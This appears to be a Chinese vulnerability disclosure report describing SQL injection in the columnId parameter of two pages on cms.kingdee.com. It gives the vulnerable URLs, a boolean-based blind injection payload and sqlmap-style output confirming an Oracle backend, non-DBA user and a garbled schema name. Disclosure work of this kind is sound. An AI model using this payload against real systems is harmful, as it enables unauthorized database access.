### 简要描述:
SQL注入
### 详细说明:
1.http://cms.kingdee.com/solutions/business/manufacture/manufactureCaseList.jsp?columnId=150201301401,150202301401,150202302401,150202303401
2.http://cms.kingdee.com/solutions/business/scm/scmCaseList.jsp?columnId=151201301,151202301
### 漏洞证明:
```
Place: GET
Parameter: columnId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: columnId=151201301,151202301%' AND 4164=4164 AND '%'='
---
web application technology: JSP
back-end DBMS: Oracle
```
不是DBA:
```
web application technology: JSP
back-end DBMS: Oracle
current user is DBA: False
```
数据库:
```
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): '?숀`@x߂рw߱ߢߢ!'
```
京公网安备 11010502034610号
暂无评论